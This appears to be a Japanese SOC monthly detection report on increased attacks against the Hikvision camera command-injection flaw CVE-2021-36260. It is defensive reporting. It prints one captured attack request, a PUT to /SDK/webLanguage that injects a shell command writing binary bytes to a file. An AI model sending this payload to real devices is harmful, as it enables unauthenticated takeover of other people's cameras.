2023.06.14

2023年5月度 MBSD-SOCの検知傾向トピックス

Hikvision製ネットワークカメラの脆弱性（CVE-2021-36260）を狙った攻撃

　今月は、Hikvision製ネットワークカメラの脆弱性を狙った攻撃が増加しました。本脆弱性は、2021年9月に公開されたOSコマンドインジェクションの脆弱性です。入力検証の不備により、認証なしでrootユーザとして任意のコードを実行されてしまう恐れがあります。

　弊社SOCでは、本脆弱性を狙った攻撃を断続的に観測していましたが、5/26(金)以降に検知数が増加しました。下図は、今年1月から5月末までの本脆弱性を狙った攻撃数の推移です。

　下図は、弊社SOCで実際に検知した攻撃のパケットペイロードです。/SDK/webLanguageに対するPUTリクエストにおいて、XMLの中にコマンドを挿入して実行を試みた通信となっています。

図. CVE-2021-36260の脆弱性を狙った攻撃検知例
PUT /SDK/webLanguage HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Accept-Encoding: gzip, deflate Accept: / Connection: keep-alive Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en US,en;q=0.9,sv;q=0.8 Host: www.example.co.jp Content-Length: 211 <?xml version="1.0" encoding="UTF-8"?><language>$(echo -ne "\x00\x00\x00\xef\x01\x0a\x70\xe3\x00\x20\xa0\xe1\x00\x00\xa0\x91\x05\x00\x00\x9a\x1c\x30\x9f\xe5\x2c\x01\x00\xeb\x03\x30\x9f\xe7" >> update)</language>